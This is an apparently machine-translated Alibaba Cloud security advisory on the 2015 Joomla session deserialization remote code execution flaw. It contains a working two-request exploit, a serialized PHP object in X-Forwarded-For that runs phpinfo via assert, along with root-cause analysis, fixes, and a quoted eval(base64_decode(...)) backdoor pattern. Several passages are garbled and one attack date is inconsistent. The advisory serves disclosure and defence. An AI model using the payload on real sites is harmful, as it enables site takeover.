Ali Cloud security · 2015/12/16 16:05

Author: Aliyun Security attack and defense team

Recently, Joomla again exposed high-risk 0day vulnerability, can be remote command execution, Ali Yunyunshield yesterday launched the corresponding interception rules to resist the vulnerability. In the meantime, call notifications and automated bug fixes have been made to cloud hosting customers. According to statistics, hundreds of malicious IP addresses have attempted to use the vulnerability to launch attacks on Aliyun website by the early morning of April 16. Cloud Shield has successfully blocked tens of thousands of attack requests, among which the hacker who ranked first in the number of attack requests tried to penetrate more than 1,000 Joomla websites within an hour.

Joomla officially released 3.4.6 as an emergency release due to the bug. In addition to upgrading to the latest version as soon as possible, Joomla users can also use a more complete fix provided by ali Cloud security team to harden the site. For details, please refer to: 0x03 Bug Fix.

0x00 Vulnerability Description


Yesterday, the Joomla security team urgently released Version 3.4.6 of Joomla, which fixes a high-risk 0day vulnerability. The vulnerability, which affects all versions 1.5 through 3.4.5, allows arbitrary PHP code to be executed directly from the foreground without requiring a login.

0x01 Vulnerability Exploited


The vulnerability is triggered by sending malicious code to a website through user-Agent or X-Forwarded-For, which carries the cookie value returned by the website to a second request. Or specifying a cookie value on the first request and carrying the same cookie value on the second request can also trigger the vulnerability.

Request:

#! Bash GET/HTTP / 1.1 Host: 127.0.0.1 X-ray Forwarded - For:} __test | O: 21: "JDatabaseDriverMysqli" : 3: {s: 2: "fc"; O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers"; a:1:{i:0; a:2:{i:0; O:9:"SimplePie":5:{s:8:"sanitize"; O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url"; s:37:"phpinfo(); JFactory::getConfig(); exit;" ; s:19:"cache_name_function"; s:6:"assert"; s:5:"cache"; b:1; s:11:"cache_class"; O:20:"JDatabaseDriverMysql":0:{}}i:1; s:4:"init"; }}s:13:"\0\0\0connection"; b:1; } ð cookies: 3342514 dde143a04dad958b2eb5a748a = pd4nnqlps2suk9r70189jkpdn2Copy the code

Request 2:

#! Bash GET/HTTP / 1.1 Host: 127.0.0.1 cookies: 3342514 dde143a04dad958b2eb5a748a = pd4nnqlps2suk9r70189jkpdn2Copy the code

If the execution succeeds, the result of phpInfo () is displayed in the return of request two.

0x02 Vulnerability Analysis


In the libraries/joomla/session/session. PHP file, joomla HTTP_USER_AGENT and HTTP_X_FORWARDED_FOR direct deposit to the session

#! PHP... // Record proxy forwarded for in the session in case we need it later if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $this->set('session.client.forwarded',$_SERVER['HTTP_X_FORWARDED_FOR']); ... // Check for clients browser if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT'])) { $browser = $this->get('session.client.browser'); if ($browser === null) { $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']); }}Copy the code

Continue to follow up joomla for handling the session, in/libraries/joomla/session/storage JSessionStorage within the PHP class, Session_set_save_handler is used to implement the read() and write() methods of session storage. As defined in the PHP manual, the read() and write() parameters are automatically serialized and deserialized, respectively. This part of serialization is done by the PHP kernel:

Continue to into the read () and write () function, the code is located in the libraries/joomla/session/storage directory, from all the session storage engines in the implementation of the code you can see, Joomla writes to the session value without securing it. By default, Joomla uses the database engine to store sessions, which is also one of the conditions for this vulnerability to be successfully exploited. When constructing exp, it takes advantage of Mysql’s character truncation feature and finally writes to a damaged and illegal deserialized object in the database. When this object is read by read(), the PHP kernel (PHP <= 5.6.13) interprets session.client.forwarded. if this object is forwardedby forwardedto session (), the PHP kernel (PHP <= 5.6.13) interprets session.client. After php_VAR_unserialize fails, PHP will start the next key-value attempt after php_VAR_unserialize fails. PHP core will attacker injected “|” as the separator, analyze the key – value, deserialize led to the execution object method.

There are two essential reasons for the vulnerability, one is the session parser bug of PHP kernel, the other is the character truncation feature of mysql database. This vulnerability cannot be repeated if the session storage engine used does not have character truncation features such as Mysql. When testing this vulnerability, we set $session_handler in the Joomla configuration file configuration. PHP to None, indicating that session is stored in the file system.

0x03 Vulnerability Repair


Joomla officially released version 3.4.6 yesterday. Than code, found that after the official update only in/libraries/joomla/session/session. PHP will delete the HTTP_USER_AGENT writing the code in the session variable, Added validation of HTTP_X_FORWARDED_FOR getting IP, fixed usage points in exp that were exposed. However, there is no official fix for the JSessionStorage class’s unsafe handling of sessions, so there is a possibility that this fix could be circumvented. The same constructor can be used to trigger the vulnerability whenever an attacker finds a location for a new controllable SESSION value.

The following is a more complete repair scheme:

Modifying the Joomla root directory configuration. PHP to change $session_handler to None sets the session storage engine to the file system. Upgrade PHP to 5.6.13 or higher.

Log in to the Joomla background and upgrade to version 3.4.6 or higher.

0x04 Threat Status


According to statistics, hundreds of malicious IP addresses have attempted to use the vulnerability to launch attacks on Aliyun website by the early morning of April 16. Cloud Shield has successfully blocked tens of thousands of attack requests, among which the hacker who ranked first in the number of attack requests tried to penetrate more than 1,000 Joomla websites within an hour.

For payload analysis, most attackers insert a code such as eval(base64_decode($_POST [a])) in the first request and try to write a Trojan into the website root directory in the second request. If the attack is successful, the site will be completely controlled by the attacker. Some attackers use open vulnerabilities on the Internet to detect the payload, such as phpInfo (). And md5 (233333); This code generally does not pose a threat to the site.

Related links:

https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html 
https://github.com/80vul/phpcodz/blob/master/research/pch-031.md
Copy the code